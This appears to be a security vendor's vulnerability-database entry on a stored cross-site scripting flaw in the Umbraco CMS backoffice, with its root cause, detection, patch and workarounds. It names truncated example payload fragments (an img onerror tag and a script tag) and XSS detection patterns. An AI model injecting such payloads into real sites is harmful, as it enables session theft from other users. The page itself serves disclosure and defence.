Skip to main content
A Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection. Six years running.Find Out Why
CVE Vulnerability Database
Vulnerability Database/CVE-2026-46609

CVE-2026-46609: Umbraco CMS XSS Vulnerability

CVE-2026-46609 is a cross-site scripting flaw in Umbraco CMS affecting versions 14.0.0 to 17.3.x, allowing authenticated users to inject malicious HTML. This article covers technical details, affected versions, and fixes.

Published:

CVE-2026-46609 Overview

CVE-2026-46609 is a stored Cross-Site Scripting (XSS) vulnerability in Umbraco CMS, an ASP.NET-based content management system. The flaw affects versions 14.0.0 through 17.3.x. Authenticated users can inject HTML markup into an input field that is later rendered in a confirmation dialog without proper output encoding. The Umbraco team patched the issue in version 17.4.0.

Critical Impact

Authenticated attackers can inject HTML or script content that executes in the browser context of other backoffice users viewing the confirmation dialog, enabling session theft or actions on behalf of the victim.

Affected Products

  • Umbraco CMS versions 14.0.0 through 17.3.x
  • ASP.NET deployments using vulnerable Umbraco backoffice components
  • Any Umbraco-based site exposing authenticated user input rendered in confirmation dialogs

Discovery Timeline

  • 2026-06-10 - CVE-2026-46609 published to NVD
  • 2026-06-10 - Last updated in NVD database

Technical Details for CVE-2026-46609

Vulnerability Analysis

The vulnerability is a stored Cross-Site Scripting (XSS) flaw classified under [CWE-79]. Umbraco's backoffice accepts user-supplied input through an input field and later displays that input inside a confirmation dialog. The dialog rendering path does not apply HTML output encoding, allowing markup and script tags supplied by an authenticated user to be interpreted by the browser.

Exploitation requires an authenticated session with permission to submit the affected input. The attacker stores malicious payload content, and execution occurs when another backoffice user triggers the confirmation dialog containing the payload. The resulting script runs in the victim's browser context within the Umbraco backoffice.

Impact is limited to confidentiality and integrity of the affected user's browser session. The vulnerability does not directly impact availability and requires user interaction to trigger the malicious payload.

Root Cause

The root cause is missing output encoding in the confirmation dialog rendering logic. The dialog component treats stored input as trusted HTML rather than escaping characters such as <, >, and " before insertion into the DOM. Standard contextual encoding for HTML body and attribute contexts would have prevented script execution.

Attack Vector

The attack vector is network-based and requires low privileges plus user interaction. An authenticated backoffice user submits a payload such as <img src=x onerror=...> or a <script> tag into the vulnerable input. When a second user later opens the confirmation dialog referencing that data, the browser parses and executes the payload. No verified public exploit code is available. Technical details are documented in the GitHub Security Advisory GHSA-vr9v-27gg-qgx4.

Detection Methods for CVE-2026-46609

Indicators of Compromise

  • Unexpected HTML tags, <script> elements, or event handler attributes such as onerror or onload stored in Umbraco content fields
  • Backoffice users reporting unexpected dialog behavior, redirects, or session anomalies
  • Outbound requests from authenticated backoffice sessions to attacker-controlled domains

Detection Strategies

  • Audit Umbraco database content fields for HTML markup or JavaScript syntax patterns that should not appear in plain-text inputs
  • Inspect web server and application logs for POST requests from low-privileged users containing encoded script payloads
  • Monitor browser Content Security Policy (CSP) violation reports originating from the Umbraco backoffice

Monitoring Recommendations

  • Enable detailed audit logging for backoffice user actions, particularly content edits that populate confirmation dialogs
  • Forward Umbraco application logs and web server logs to a centralized SIEM for correlation across user sessions
  • Alert on backoffice account activity that includes input patterns matching common XSS payloads

How to Mitigate CVE-2026-46609

Immediate Actions Required

  • Upgrade Umbraco CMS to version 17.4.0 or later
  • Review recent backoffice user submissions for stored HTML or script content and remove malicious entries
  • Rotate credentials and sessions for any backoffice users suspected of exposure to the payload

Patch Information

Umbraco released version 17.4.0 with proper output encoding applied to the confirmation dialog rendering path. The fix is documented in the Umbraco GitHub Security Advisory. All deployments running versions 14.0.0 through 17.3.x should upgrade to the patched release.

Workarounds

  • Restrict backoffice access to trusted administrators until the patch is applied
  • Deploy a Content Security Policy (CSP) that disallows inline script execution in the Umbraco backoffice
  • Apply a web application firewall (WAF) rule to block HTML and script syntax in affected input fields
bash
# Upgrade Umbraco CMS via dotnet CLI
dotnet add package Umbraco.Cms --version 17.4.0
dotnet restore
dotnet build

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.

Try SentinelOne